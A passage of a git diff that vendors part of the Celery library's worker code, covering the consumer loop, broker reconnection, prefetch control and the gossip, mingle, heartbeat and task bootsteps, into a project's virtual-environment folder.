+ first_connection_attempt = True + + class Blueprint(bootsteps.Blueprint): + """Consumer blueprint.""" + + name = 'Consumer' + default_steps = [ + 'celery.worker.consumer.connection:Connection', + 'celery.worker.consumer.mingle:Mingle', + 'celery.worker.consumer.events:Events', + 'celery.worker.consumer.gossip:Gossip', + 'celery.worker.consumer.heart:Heart', + 'celery.worker.consumer.control:Control', + 'celery.worker.consumer.tasks:Tasks', + 'celery.worker.consumer.consumer:Evloop', + 'celery.worker.consumer.agent:Agent', + ] + + def shutdown(self, parent): + self.send_all(parent, 'shutdown') + + def __init__(self, on_task_request, + init_callback=noop, hostname=None, + pool=None, app=None, + timer=None, controller=None, hub=None, amqheartbeat=None, + worker_options=None, disable_rate_limits=False, + initial_prefetch_count=2, prefetch_multiplier=1, **kwargs): + self.app = app + self.controller = controller + self.init_callback = init_callback + self.hostname = hostname or gethostname() + self.pid = os.getpid() + self.pool = pool + self.timer = timer + self.strategies = self.Strategies() + self.conninfo = self.app.connection_for_read() + self.connection_errors = self.conninfo.connection_errors + self.channel_errors = self.conninfo.channel_errors + self._restart_state = restart_state(maxR=5, maxT=1) + + self._does_info = logger.isEnabledFor(logging.INFO) + self._limit_order = 0 + self.on_task_request = on_task_request + self.on_task_message = set() + self.amqheartbeat_rate = self.app.conf.broker_heartbeat_checkrate + self.disable_rate_limits = disable_rate_limits + self.initial_prefetch_count = initial_prefetch_count + self.prefetch_multiplier = prefetch_multiplier + self._maximum_prefetch_restored = True + + # this contains a tokenbucket for each task type by name, used for + # rate limits, or None if rate limits are disabled for that task. + self.task_buckets = defaultdict(lambda: None) + self.reset_rate_limits() + + self.hub = hub + if self.hub or getattr(self.pool, 'is_green', False): + self.amqheartbeat = amqheartbeat + if self.amqheartbeat is None: + self.amqheartbeat = self.app.conf.broker_heartbeat + else: + self.amqheartbeat = 0 + + if not hasattr(self, 'loop'): + self.loop = loops.asynloop if hub else loops.synloop + + if _detect_environment() == 'gevent': + # there's a gevent bug that causes timeouts to not be reset, + # so if the connection timeout is exceeded once, it can NEVER + # connect again. + self.app.conf.broker_connection_timeout = None + + self._pending_operations = [] + + self.steps = [] + self.blueprint = self.Blueprint( + steps=self.app.steps['consumer'], + on_close=self.on_close, + ) + self.blueprint.apply(self, **dict(worker_options or {}, **kwargs)) + + def call_soon(self, p, *args, **kwargs): + p = ppartial(p, *args, **kwargs) + if self.hub: + return self.hub.call_soon(p) + self._pending_operations.append(p) + return p + + def perform_pending_operations(self): + if not self.hub: + while self._pending_operations: + try: + self._pending_operations.pop()() + except Exception as exc: # pylint: disable=broad-except + logger.exception('Pending callback raised: %r', exc) + + def bucket_for_task(self, type): + limit = rate(getattr(type, 'rate_limit', None)) + return TokenBucket(limit, capacity=1) if limit else None + + def reset_rate_limits(self): + self.task_buckets.update( + (n, self.bucket_for_task(t)) for n, t in self.app.tasks.items() + ) + + def _update_prefetch_count(self, index=0): + """Update prefetch count after pool/shrink grow operations. 
+ + Index must be the change in number of processes as a positive + (increasing) or negative (decreasing) number. + + Note: + Currently pool grow operations will end up with an offset + of +1 if the initial size of the pool was 0 (e.g. + :option:`--autoscale=1,0 `). + """ + num_processes = self.pool.num_processes + if not self.initial_prefetch_count or not num_processes: + return # prefetch disabled + self.initial_prefetch_count = ( + self.pool.num_processes * self.prefetch_multiplier + ) + return self._update_qos_eventually(index) + + def _update_qos_eventually(self, index): + return (self.qos.decrement_eventually if index < 0 + else self.qos.increment_eventually)( + abs(index) * self.prefetch_multiplier) + + def _limit_move_to_pool(self, request): + task_reserved(request) + self.on_task_request(request) + + def _schedule_bucket_request(self, bucket): + while True: + try: + request, tokens = bucket.pop() + except IndexError: + # no request, break + break + + if bucket.can_consume(tokens): + self._limit_move_to_pool(request) + continue + else: + # requeue to head, keep the order. + bucket.contents.appendleft((request, tokens)) + + pri = self._limit_order = (self._limit_order + 1) % 10 + hold = bucket.expected_time(tokens) + self.timer.call_after( + hold, self._schedule_bucket_request, (bucket,), + priority=pri, + ) + # no tokens, break + break + + def _limit_task(self, request, bucket, tokens): + bucket.add((request, tokens)) + return self._schedule_bucket_request(bucket) + + def _limit_post_eta(self, request, bucket, tokens): + self.qos.decrement_eventually() + bucket.add((request, tokens)) + return self._schedule_bucket_request(bucket) + + def start(self): + blueprint = self.blueprint + while blueprint.state not in STOP_CONDITIONS: + maybe_shutdown() + if self.restart_count: + try: + self._restart_state.step() + except RestartFreqExceeded as exc: + crit('Frequent restarts detected: %r', exc, exc_info=1) + sleep(1) + self.restart_count += 1 + if self.app.conf.broker_channel_error_retry: + recoverable_errors = (self.connection_errors + self.channel_errors) + else: + recoverable_errors = self.connection_errors + try: + blueprint.start(self) + except recoverable_errors as exc: + # If we're not retrying connections, we need to properly shutdown or terminate + # the Celery main process instead of abruptly aborting the process without any cleanup. + is_connection_loss_on_startup = self.first_connection_attempt + self.first_connection_attempt = False + connection_retry_type = self._get_connection_retry_type(is_connection_loss_on_startup) + connection_retry = self.app.conf[connection_retry_type] + if not connection_retry: + crit( + f"Retrying to {'establish' if is_connection_loss_on_startup else 're-establish'} " + f"a connection to the message broker after a connection loss has " + f"been disabled (app.conf.{connection_retry_type}=False). Shutting down..." + ) + raise WorkerShutdown(1) from exc + if isinstance(exc, OSError) and exc.errno == errno.EMFILE: + crit("Too many open files. 
Aborting...") + raise WorkerTerminate(1) from exc + maybe_shutdown() + if blueprint.state not in STOP_CONDITIONS: + if self.connection: + self.on_connection_error_after_connected(exc) + else: + self.on_connection_error_before_connected(exc) + self.on_close() + blueprint.restart(self) + + def _get_connection_retry_type(self, is_connection_loss_on_startup): + return ('broker_connection_retry_on_startup' + if (is_connection_loss_on_startup + and self.app.conf.broker_connection_retry_on_startup is not None) + else 'broker_connection_retry') + + def on_connection_error_before_connected(self, exc): + error(CONNECTION_ERROR, self.conninfo.as_uri(), exc, + 'Trying to reconnect...') + + def on_connection_error_after_connected(self, exc): + warn(CONNECTION_RETRY, exc_info=True) + try: + self.connection.collect() + except Exception: # pylint: disable=broad-except + pass + + if self.app.conf.worker_cancel_long_running_tasks_on_connection_loss: + for request in tuple(active_requests): + if request.task.acks_late and not request.acknowledged: + warn(TERMINATING_TASK_ON_RESTART_AFTER_A_CONNECTION_LOSS, + request) + request.cancel(self.pool) + else: + warnings.warn(CANCEL_TASKS_BY_DEFAULT, CPendingDeprecationWarning) + + self.initial_prefetch_count = max( + self.prefetch_multiplier, + self.max_prefetch_count - len(tuple(active_requests)) * self.prefetch_multiplier + ) + + self._maximum_prefetch_restored = self.initial_prefetch_count == self.max_prefetch_count + if not self._maximum_prefetch_restored: + logger.info( + f"Temporarily reducing the prefetch count to {self.initial_prefetch_count} to avoid over-fetching " + f"since {len(tuple(active_requests))} tasks are currently being processed.\n" + f"The prefetch count will be gradually restored to {self.max_prefetch_count} as the tasks " + "complete processing." + ) + + def register_with_event_loop(self, hub): + self.blueprint.send_all( + self, 'register_with_event_loop', args=(hub,), + description='Hub.register', + ) + + def shutdown(self): + self.blueprint.shutdown(self) + + def stop(self): + self.blueprint.stop(self) + + def on_ready(self): + callback, self.init_callback = self.init_callback, None + if callback: + callback(self) + + def loop_args(self): + return (self, self.connection, self.task_consumer, + self.blueprint, self.hub, self.qos, self.amqheartbeat, + self.app.clock, self.amqheartbeat_rate) + + def on_decode_error(self, message, exc): + """Callback called if an error occurs while decoding a message. + + Simply logs the error and acknowledges the message so it + doesn't enter a loop. + + Arguments: + message (kombu.Message): The message received. + exc (Exception): The exception being handled. + """ + crit(MESSAGE_DECODE_ERROR, + exc, message.content_type, message.content_encoding, + safe_repr(message.headers), dump_body(message, message.body), + exc_info=1) + message.ack() + + def on_close(self): + # Clear internal queues to get rid of old messages. + # They can't be acked anyway, as a delivery tag is specific + # to the current channel. + if self.controller and self.controller.semaphore: + self.controller.semaphore.clear() + if self.timer: + self.timer.clear() + for bucket in self.task_buckets.values(): + if bucket: + bucket.clear_pending() + for request_id in reserved_requests: + if request_id in requests: + del requests[request_id] + reserved_requests.clear() + if self.pool and self.pool.flush: + self.pool.flush() + + def connect(self): + """Establish the broker connection used for consuming tasks. 
+ + Retries establishing the connection if the + :setting:`broker_connection_retry` setting is enabled + """ + conn = self.connection_for_read(heartbeat=self.amqheartbeat) + if self.hub: + conn.transport.register_with_event_loop(conn.connection, self.hub) + return conn + + def connection_for_read(self, heartbeat=None): + return self.ensure_connected( + self.app.connection_for_read(heartbeat=heartbeat)) + + def connection_for_write(self, heartbeat=None): + return self.ensure_connected( + self.app.connection_for_write(heartbeat=heartbeat)) + + def ensure_connected(self, conn): + # Callback called for each retry while the connection + # can't be established. + def _error_handler(exc, interval, next_step=CONNECTION_RETRY_STEP): + if getattr(conn, 'alt', None) and interval == 0: + next_step = CONNECTION_FAILOVER + next_step = next_step.format( + when=humanize_seconds(interval, 'in', ' '), + retries=int(interval / 2), + max_retries=self.app.conf.broker_connection_max_retries) + error(CONNECTION_ERROR, conn.as_uri(), exc, next_step) + + # Remember that the connection is lazy, it won't establish + # until needed. + + # TODO: Rely only on broker_connection_retry_on_startup to determine whether connection retries are disabled. + # We will make the switch in Celery 6.0. + + retry_disabled = False + + if self.app.conf.broker_connection_retry_on_startup is None: + # If broker_connection_retry_on_startup is not set, revert to broker_connection_retry + # to determine whether connection retries are disabled. + retry_disabled = not self.app.conf.broker_connection_retry + + warnings.warn( + CPendingDeprecationWarning( + f"The broker_connection_retry configuration setting will no longer determine\n" + f"whether broker connection retries are made during startup in Celery 6.0 and above.\n" + f"If you wish to retain the existing behavior for retrying connections on startup,\n" + f"you should set broker_connection_retry_on_startup to {self.app.conf.broker_connection_retry}.") + ) + else: + if self.first_connection_attempt: + retry_disabled = not self.app.conf.broker_connection_retry_on_startup + else: + retry_disabled = not self.app.conf.broker_connection_retry + + if retry_disabled: + # Retry disabled, just call connect directly. + conn.connect() + self.first_connection_attempt = False + return conn + + conn = conn.ensure_connection( + _error_handler, self.app.conf.broker_connection_max_retries, + callback=maybe_shutdown, + ) + self.first_connection_attempt = False + return conn + + def _flush_events(self): + if self.event_dispatcher: + self.event_dispatcher.flush() + + def on_send_event_buffered(self): + if self.hub: + self.hub._ready.add(self._flush_events) + + def add_task_queue(self, queue, exchange=None, exchange_type=None, + routing_key=None, **options): + cset = self.task_consumer + queues = self.app.amqp.queues + # Must use in' here, as __missing__ will automatically + # create queues when :setting:`task_create_missing_queues` is enabled. 
+ # (Issue #1079) + if queue in queues: + q = queues[queue] + else: + exchange = queue if exchange is None else exchange + exchange_type = ('direct' if exchange_type is None + else exchange_type) + q = queues.select_add(queue, + exchange=exchange, + exchange_type=exchange_type, + routing_key=routing_key, **options) + if not cset.consuming_from(queue): + cset.add_queue(q) + cset.consume() + info('Started consuming from %s', queue) + + def cancel_task_queue(self, queue): + info('Canceling queue %s', queue) + self.app.amqp.queues.deselect(queue) + self.task_consumer.cancel_by_queue(queue) + + def apply_eta_task(self, task): + """Method called by the timer to apply a task with an ETA/countdown.""" + task_reserved(task) + self.on_task_request(task) + self.qos.decrement_eventually() + + def _message_report(self, body, message): + return MESSAGE_REPORT.format(dump_body(message, body), + safe_repr(message.content_type), + safe_repr(message.content_encoding), + safe_repr(message.delivery_info), + safe_repr(message.headers)) + + def on_unknown_message(self, body, message): + warn(UNKNOWN_FORMAT, self._message_report(body, message)) + message.reject_log_error(logger, self.connection_errors) + signals.task_rejected.send(sender=self, message=message, exc=None) + + def on_unknown_task(self, body, message, exc): + error(UNKNOWN_TASK_ERROR, + exc, + dump_body(message, body), + message.headers, + message.delivery_info, + exc_info=True) + try: + id_, name = message.headers['id'], message.headers['task'] + root_id = message.headers.get('root_id') + except KeyError: # proto1 + payload = message.payload + id_, name = payload['id'], payload['task'] + root_id = None + request = Bunch( + name=name, chord=None, root_id=root_id, + correlation_id=message.properties.get('correlation_id'), + reply_to=message.properties.get('reply_to'), + errbacks=None, + ) + message.reject_log_error(logger, self.connection_errors) + self.app.backend.mark_as_failure( + id_, NotRegistered(name), request=request, + ) + if self.event_dispatcher: + self.event_dispatcher.send( + 'task-failed', uuid=id_, + exception=f'NotRegistered({name!r})', + ) + signals.task_unknown.send( + sender=self, message=message, exc=exc, name=name, id=id_, + ) + + def on_invalid_task(self, body, message, exc): + error(INVALID_TASK_ERROR, exc, dump_body(message, body), + exc_info=True) + message.reject_log_error(logger, self.connection_errors) + signals.task_rejected.send(sender=self, message=message, exc=exc) + + def update_strategies(self): + loader = self.app.loader + for name, task in self.app.tasks.items(): + self.strategies[name] = task.start_strategy(self.app, self) + task.__trace__ = build_tracer(name, task, loader, self.hostname, + app=self.app) + + def create_task_handler(self, promise=promise): + strategies = self.strategies + on_unknown_message = self.on_unknown_message + on_unknown_task = self.on_unknown_task + on_invalid_task = self.on_invalid_task + callbacks = self.on_task_message + call_soon = self.call_soon + + def on_task_received(message): + # payload will only be set for v1 protocol, since v2 + # will defer deserializing the message body to the pool. 
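+            # Protocol v2 carries the task name in ``message.headers['task']``,
+            # while protocol v1 only exposes it after decoding the body; the
+            # try/except chain below distinguishes the two cases.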
+ payload = None + try: + type_ = message.headers['task'] # protocol v2 + except TypeError: + return on_unknown_message(None, message) + except KeyError: + try: + payload = message.decode() + except Exception as exc: # pylint: disable=broad-except + return self.on_decode_error(message, exc) + try: + type_, payload = payload['task'], payload # protocol v1 + except (TypeError, KeyError): + return on_unknown_message(payload, message) + try: + strategy = strategies[type_] + except KeyError as exc: + return on_unknown_task(None, message, exc) + else: + try: + ack_log_error_promise = promise( + call_soon, + (message.ack_log_error,), + on_error=self._restore_prefetch_count_after_connection_restart, + ) + reject_log_error_promise = promise( + call_soon, + (message.reject_log_error,), + on_error=self._restore_prefetch_count_after_connection_restart, + ) + + if ( + not self._maximum_prefetch_restored + and self.restart_count > 0 + and self._new_prefetch_count <= self.max_prefetch_count + ): + ack_log_error_promise.then(self._restore_prefetch_count_after_connection_restart, + on_error=self._restore_prefetch_count_after_connection_restart) + reject_log_error_promise.then(self._restore_prefetch_count_after_connection_restart, + on_error=self._restore_prefetch_count_after_connection_restart) + + strategy( + message, payload, + ack_log_error_promise, + reject_log_error_promise, + callbacks, + ) + except (InvalidTaskError, ContentDisallowed) as exc: + return on_invalid_task(payload, message, exc) + except DecodeError as exc: + return self.on_decode_error(message, exc) + + return on_task_received + + def _restore_prefetch_count_after_connection_restart(self, p, *args): + with self.qos._mutex: + if self._maximum_prefetch_restored: + return + + new_prefetch_count = min(self.max_prefetch_count, self._new_prefetch_count) + self.qos.value = self.initial_prefetch_count = new_prefetch_count + self.qos.set(self.qos.value) + + already_restored = self._maximum_prefetch_restored + self._maximum_prefetch_restored = new_prefetch_count == self.max_prefetch_count + + if already_restored is False and self._maximum_prefetch_restored is True: + logger.info( + "Resuming normal operations following a restart.\n" + f"Prefetch count has been restored to the maximum of {self.max_prefetch_count}" + ) + + @property + def max_prefetch_count(self): + return self.pool.num_processes * self.prefetch_multiplier + + @property + def _new_prefetch_count(self): + return self.qos.value + self.prefetch_multiplier + + def __repr__(self): + """``repr(self)``.""" + return ''.format( + self=self, state=self.blueprint.human_state(), + ) + + +class Evloop(bootsteps.StartStopStep): + """Event loop service. + + Note: + This is always started last. + """ + + label = 'event loop' + last = True + + def start(self, c): + self.patch_all(c) + c.loop(*c.loop_args()) + + def patch_all(self, c): + c.qos._mutex = DummyLock() diff --git a/env/Lib/site-packages/celery/worker/consumer/control.py b/env/Lib/site-packages/celery/worker/consumer/control.py new file mode 100644 index 00000000..b0ca3ef8 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/control.py @@ -0,0 +1,33 @@ +"""Worker Remote Control Bootstep. + +``Control`` -> :mod:`celery.worker.pidbox` -> :mod:`kombu.pidbox`. + +The actual commands are implemented in :mod:`celery.worker.control`. 
+""" +from celery import bootsteps +from celery.utils.log import get_logger +from celery.worker import pidbox + +from .tasks import Tasks + +__all__ = ('Control',) + +logger = get_logger(__name__) + + +class Control(bootsteps.StartStopStep): + """Remote control command service.""" + + requires = (Tasks,) + + def __init__(self, c, **kwargs): + self.is_green = c.pool is not None and c.pool.is_green + self.box = (pidbox.gPidbox if self.is_green else pidbox.Pidbox)(c) + self.start = self.box.start + self.stop = self.box.stop + self.shutdown = self.box.shutdown + super().__init__(c, **kwargs) + + def include_if(self, c): + return (c.app.conf.worker_enable_remote_control and + c.conninfo.supports_exchange_type('fanout')) diff --git a/env/Lib/site-packages/celery/worker/consumer/events.py b/env/Lib/site-packages/celery/worker/consumer/events.py new file mode 100644 index 00000000..7ff47356 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/events.py @@ -0,0 +1,68 @@ +"""Worker Event Dispatcher Bootstep. + +``Events`` -> :class:`celery.events.EventDispatcher`. +""" +from kombu.common import ignore_errors + +from celery import bootsteps + +from .connection import Connection + +__all__ = ('Events',) + + +class Events(bootsteps.StartStopStep): + """Service used for sending monitoring events.""" + + requires = (Connection,) + + def __init__(self, c, + task_events=True, + without_heartbeat=False, + without_gossip=False, + **kwargs): + self.groups = None if task_events else ['worker'] + self.send_events = ( + task_events or + not without_gossip or + not without_heartbeat + ) + self.enabled = self.send_events + c.event_dispatcher = None + super().__init__(c, **kwargs) + + def start(self, c): + # flush events sent while connection was down. + prev = self._close(c) + dis = c.event_dispatcher = c.app.events.Dispatcher( + c.connection_for_write(), + hostname=c.hostname, + enabled=self.send_events, + groups=self.groups, + # we currently only buffer events when the event loop is enabled + # XXX This excludes eventlet/gevent, which should actually buffer. 
+ buffer_group=['task'] if c.hub else None, + on_send_buffered=c.on_send_event_buffered if c.hub else None, + ) + if prev: + dis.extend_buffer(prev) + dis.flush() + + def stop(self, c): + pass + + def _close(self, c): + if c.event_dispatcher: + dispatcher = c.event_dispatcher + # remember changes from remote control commands: + self.groups = dispatcher.groups + + # close custom connection + if dispatcher.connection: + ignore_errors(c, dispatcher.connection.close) + ignore_errors(c, dispatcher.close) + c.event_dispatcher = None + return dispatcher + + def shutdown(self, c): + self._close(c) diff --git a/env/Lib/site-packages/celery/worker/consumer/gossip.py b/env/Lib/site-packages/celery/worker/consumer/gossip.py new file mode 100644 index 00000000..16e1c2ef --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/gossip.py @@ -0,0 +1,205 @@ +"""Worker <-> Worker communication Bootstep.""" +from collections import defaultdict +from functools import partial +from heapq import heappush +from operator import itemgetter + +from kombu import Consumer +from kombu.asynchronous.semaphore import DummyLock +from kombu.exceptions import ContentDisallowed, DecodeError + +from celery import bootsteps +from celery.utils.log import get_logger +from celery.utils.objects import Bunch + +from .mingle import Mingle + +__all__ = ('Gossip',) + +logger = get_logger(__name__) +debug, info = logger.debug, logger.info + + +class Gossip(bootsteps.ConsumerStep): + """Bootstep consuming events from other workers. + + This keeps the logical clock value up to date. + """ + + label = 'Gossip' + requires = (Mingle,) + _cons_stamp_fields = itemgetter( + 'id', 'clock', 'hostname', 'pid', 'topic', 'action', 'cver', + ) + compatible_transports = {'amqp', 'redis'} + + def __init__(self, c, without_gossip=False, + interval=5.0, heartbeat_interval=2.0, **kwargs): + self.enabled = not without_gossip and self.compatible_transport(c.app) + self.app = c.app + c.gossip = self + self.Receiver = c.app.events.Receiver + self.hostname = c.hostname + self.full_hostname = '.'.join([self.hostname, str(c.pid)]) + self.on = Bunch( + node_join=set(), + node_leave=set(), + node_lost=set(), + ) + + self.timer = c.timer + if self.enabled: + self.state = c.app.events.State( + on_node_join=self.on_node_join, + on_node_leave=self.on_node_leave, + max_tasks_in_memory=1, + ) + if c.hub: + c._mutex = DummyLock() + self.update_state = self.state.event + self.interval = interval + self.heartbeat_interval = heartbeat_interval + self._tref = None + self.consensus_requests = defaultdict(list) + self.consensus_replies = {} + self.event_handlers = { + 'worker.elect': self.on_elect, + 'worker.elect.ack': self.on_elect_ack, + } + self.clock = c.app.clock + + self.election_handlers = { + 'task': self.call_task + } + + super().__init__(c, **kwargs) + + def compatible_transport(self, app): + with app.connection_for_read() as conn: + return conn.transport.driver_type in self.compatible_transports + + def election(self, id, topic, action=None): + self.consensus_replies[id] = [] + self.dispatcher.send( + 'worker-elect', + id=id, topic=topic, action=action, cver=1, + ) + + def call_task(self, task): + try: + self.app.signature(task).apply_async() + except Exception as exc: # pylint: disable=broad-except + logger.exception('Could not call task: %r', exc) + + def on_elect(self, event): + try: + (id_, clock, hostname, pid, + topic, action, _) = self._cons_stamp_fields(event) + except KeyError as exc: + return logger.exception('election request missing field %s', 
exc) + heappush( + self.consensus_requests[id_], + (clock, f'{hostname}.{pid}', topic, action), + ) + self.dispatcher.send('worker-elect-ack', id=id_) + + def start(self, c): + super().start(c) + self.dispatcher = c.event_dispatcher + + def on_elect_ack(self, event): + id = event['id'] + try: + replies = self.consensus_replies[id] + except KeyError: + return # not for us + alive_workers = set(self.state.alive_workers()) + replies.append(event['hostname']) + + if len(replies) >= len(alive_workers): + _, leader, topic, action = self.clock.sort_heap( + self.consensus_requests[id], + ) + if leader == self.full_hostname: + info('I won the election %r', id) + try: + handler = self.election_handlers[topic] + except KeyError: + logger.exception('Unknown election topic %r', topic) + else: + handler(action) + else: + info('node %s elected for %r', leader, id) + self.consensus_requests.pop(id, None) + self.consensus_replies.pop(id, None) + + def on_node_join(self, worker): + debug('%s joined the party', worker.hostname) + self._call_handlers(self.on.node_join, worker) + + def on_node_leave(self, worker): + debug('%s left', worker.hostname) + self._call_handlers(self.on.node_leave, worker) + + def on_node_lost(self, worker): + info('missed heartbeat from %s', worker.hostname) + self._call_handlers(self.on.node_lost, worker) + + def _call_handlers(self, handlers, *args, **kwargs): + for handler in handlers: + try: + handler(*args, **kwargs) + except Exception as exc: # pylint: disable=broad-except + logger.exception( + 'Ignored error from handler %r: %r', handler, exc) + + def register_timer(self): + if self._tref is not None: + self._tref.cancel() + self._tref = self.timer.call_repeatedly(self.interval, self.periodic) + + def periodic(self): + workers = self.state.workers + dirty = set() + for worker in workers.values(): + if not worker.alive: + dirty.add(worker) + self.on_node_lost(worker) + for worker in dirty: + workers.pop(worker.hostname, None) + + def get_consumers(self, channel): + self.register_timer() + ev = self.Receiver(channel, routing_key='worker.#', + queue_ttl=self.heartbeat_interval) + return [Consumer( + channel, + queues=[ev.queue], + on_message=partial(self.on_message, ev.event_from_message), + no_ack=True + )] + + def on_message(self, prepare, message): + _type = message.delivery_info['routing_key'] + + # For redis when `fanout_patterns=False` (See Issue #1882) + if _type.split('.', 1)[0] == 'task': + return + try: + handler = self.event_handlers[_type] + except KeyError: + pass + else: + return handler(message.payload) + + # proto2: hostname in header; proto1: in body + hostname = (message.headers.get('hostname') or + message.payload['hostname']) + if hostname != self.hostname: + try: + _, event = prepare(message.payload) + self.update_state(event) + except (DecodeError, ContentDisallowed, TypeError) as exc: + logger.error(exc) + else: + self.clock.forward() diff --git a/env/Lib/site-packages/celery/worker/consumer/heart.py b/env/Lib/site-packages/celery/worker/consumer/heart.py new file mode 100644 index 00000000..076f5f9a --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/heart.py @@ -0,0 +1,36 @@ +"""Worker Event Heartbeat Bootstep.""" +from celery import bootsteps +from celery.worker import heartbeat + +from .events import Events + +__all__ = ('Heart',) + + +class Heart(bootsteps.StartStopStep): + """Bootstep sending event heartbeats. + + This service sends a ``worker-heartbeat`` message every n seconds. 
+ + Note: + Not to be confused with AMQP protocol level heartbeats. + """ + + requires = (Events,) + + def __init__(self, c, + without_heartbeat=False, heartbeat_interval=None, **kwargs): + self.enabled = not without_heartbeat + self.heartbeat_interval = heartbeat_interval + c.heart = None + super().__init__(c, **kwargs) + + def start(self, c): + c.heart = heartbeat.Heart( + c.timer, c.event_dispatcher, self.heartbeat_interval, + ) + c.heart.start() + + def stop(self, c): + c.heart = c.heart and c.heart.stop() + shutdown = stop diff --git a/env/Lib/site-packages/celery/worker/consumer/mingle.py b/env/Lib/site-packages/celery/worker/consumer/mingle.py new file mode 100644 index 00000000..532ab75e --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/mingle.py @@ -0,0 +1,76 @@ +"""Worker <-> Worker Sync at startup (Bootstep).""" +from celery import bootsteps +from celery.utils.log import get_logger + +from .events import Events + +__all__ = ('Mingle',) + +logger = get_logger(__name__) +debug, info, exception = logger.debug, logger.info, logger.exception + + +class Mingle(bootsteps.StartStopStep): + """Bootstep syncing state with neighbor workers. + + At startup, or upon consumer restart, this will: + + - Sync logical clocks. + - Sync revoked tasks. + + """ + + label = 'Mingle' + requires = (Events,) + compatible_transports = {'amqp', 'redis'} + + def __init__(self, c, without_mingle=False, **kwargs): + self.enabled = not without_mingle and self.compatible_transport(c.app) + super().__init__( + c, without_mingle=without_mingle, **kwargs) + + def compatible_transport(self, app): + with app.connection_for_read() as conn: + return conn.transport.driver_type in self.compatible_transports + + def start(self, c): + self.sync(c) + + def sync(self, c): + info('mingle: searching for neighbors') + replies = self.send_hello(c) + if replies: + info('mingle: sync with %s nodes', + len([reply for reply, value in replies.items() if value])) + [self.on_node_reply(c, nodename, reply) + for nodename, reply in replies.items() if reply] + info('mingle: sync complete') + else: + info('mingle: all alone') + + def send_hello(self, c): + inspect = c.app.control.inspect(timeout=1.0, connection=c.connection) + our_revoked = c.controller.state.revoked + replies = inspect.hello(c.hostname, our_revoked._data) or {} + replies.pop(c.hostname, None) # delete my own response + return replies + + def on_node_reply(self, c, nodename, reply): + debug('mingle: processing reply from %s', nodename) + try: + self.sync_with_node(c, **reply) + except MemoryError: + raise + except Exception as exc: # pylint: disable=broad-except + exception('mingle: sync with %s failed: %r', nodename, exc) + + def sync_with_node(self, c, clock=None, revoked=None, **kwargs): + self.on_clock_event(c, clock) + self.on_revoked_received(c, revoked) + + def on_clock_event(self, c, clock): + c.app.clock.adjust(clock) if clock else c.app.clock.forward() + + def on_revoked_received(self, c, revoked): + if revoked: + c.controller.state.revoked.update(revoked) diff --git a/env/Lib/site-packages/celery/worker/consumer/tasks.py b/env/Lib/site-packages/celery/worker/consumer/tasks.py new file mode 100644 index 00000000..b4e4aee9 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/tasks.py @@ -0,0 +1,65 @@ +"""Worker Task Consumer Bootstep.""" +from kombu.common import QoS, ignore_errors + +from celery import bootsteps +from celery.utils.log import get_logger + +from .mingle import Mingle + +__all__ = ('Tasks',) + +logger = 
get_logger(__name__) +debug = logger.debug + + +class Tasks(bootsteps.StartStopStep): + """Bootstep starting the task message consumer.""" + + requires = (Mingle,) + + def __init__(self, c, **kwargs): + c.task_consumer = c.qos = None + super().__init__(c, **kwargs) + + def start(self, c): + """Start task consumer.""" + c.update_strategies() + + # - RabbitMQ 3.3 completely redefines how basic_qos works... + # This will detect if the new qos semantics is in effect, + # and if so make sure the 'apply_global' flag is set on qos updates. + qos_global = not c.connection.qos_semantics_matches_spec + + # set initial prefetch count + c.connection.default_channel.basic_qos( + 0, c.initial_prefetch_count, qos_global, + ) + + c.task_consumer = c.app.amqp.TaskConsumer( + c.connection, on_decode_error=c.on_decode_error, + ) + + def set_prefetch_count(prefetch_count): + return c.task_consumer.qos( + prefetch_count=prefetch_count, + apply_global=qos_global, + ) + c.qos = QoS(set_prefetch_count, c.initial_prefetch_count) + + def stop(self, c): + """Stop task consumer.""" + if c.task_consumer: + debug('Canceling task consumer...') + ignore_errors(c, c.task_consumer.cancel) + + def shutdown(self, c): + """Shutdown task consumer.""" + if c.task_consumer: + self.stop(c) + debug('Closing consumer channel...') + ignore_errors(c, c.task_consumer.close) + c.task_consumer = None + + def info(self, c): + """Return task consumer info.""" + return {'prefetch_count': c.qos.value if c.qos else 'N/A'} diff --git a/env/Lib/site-packages/celery/worker/control.py b/env/Lib/site-packages/celery/worker/control.py new file mode 100644 index 00000000..41d059e4 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/control.py @@ -0,0 +1,624 @@ +"""Worker remote control command implementations.""" +import io +import tempfile +from collections import UserDict, defaultdict, namedtuple + +from billiard.common import TERM_SIGNAME +from kombu.utils.encoding import safe_repr + +from celery.exceptions import WorkerShutdown +from celery.platforms import signals as _signals +from celery.utils.functional import maybe_list +from celery.utils.log import get_logger +from celery.utils.serialization import jsonify, strtobool +from celery.utils.time import rate + +from . import state as worker_state +from .request import Request + +__all__ = ('Panel',) + +DEFAULT_TASK_INFO_ITEMS = ('exchange', 'routing_key', 'rate_limit') +logger = get_logger(__name__) + +controller_info_t = namedtuple('controller_info_t', [ + 'alias', 'type', 'visible', 'default_timeout', + 'help', 'signature', 'args', 'variadic', +]) + + +def ok(value): + return {'ok': value} + + +def nok(value): + return {'error': value} + + +class Panel(UserDict): + """Global registry of remote control commands.""" + + data = {} # global dict. 
+ meta = {} # -"- + + @classmethod + def register(cls, *args, **kwargs): + if args: + return cls._register(**kwargs)(*args) + return cls._register(**kwargs) + + @classmethod + def _register(cls, name=None, alias=None, type='control', + visible=True, default_timeout=1.0, help=None, + signature=None, args=None, variadic=None): + + def _inner(fun): + control_name = name or fun.__name__ + _help = help or (fun.__doc__ or '').strip().split('\n')[0] + cls.data[control_name] = fun + cls.meta[control_name] = controller_info_t( + alias, type, visible, default_timeout, + _help, signature, args, variadic) + if alias: + cls.data[alias] = fun + return fun + return _inner + + +def control_command(**kwargs): + return Panel.register(type='control', **kwargs) + + +def inspect_command(**kwargs): + return Panel.register(type='inspect', **kwargs) + +# -- App + + +@inspect_command() +def report(state): + """Information about Celery installation for bug reports.""" + return ok(state.app.bugreport()) + + +@inspect_command( + alias='dump_conf', # XXX < backwards compatible + signature='[include_defaults=False]', + args=[('with_defaults', strtobool)], +) +def conf(state, with_defaults=False, **kwargs): + """List configuration.""" + return jsonify(state.app.conf.table(with_defaults=with_defaults), + keyfilter=_wanted_config_key, + unknown_type_filter=safe_repr) + + +def _wanted_config_key(key): + return 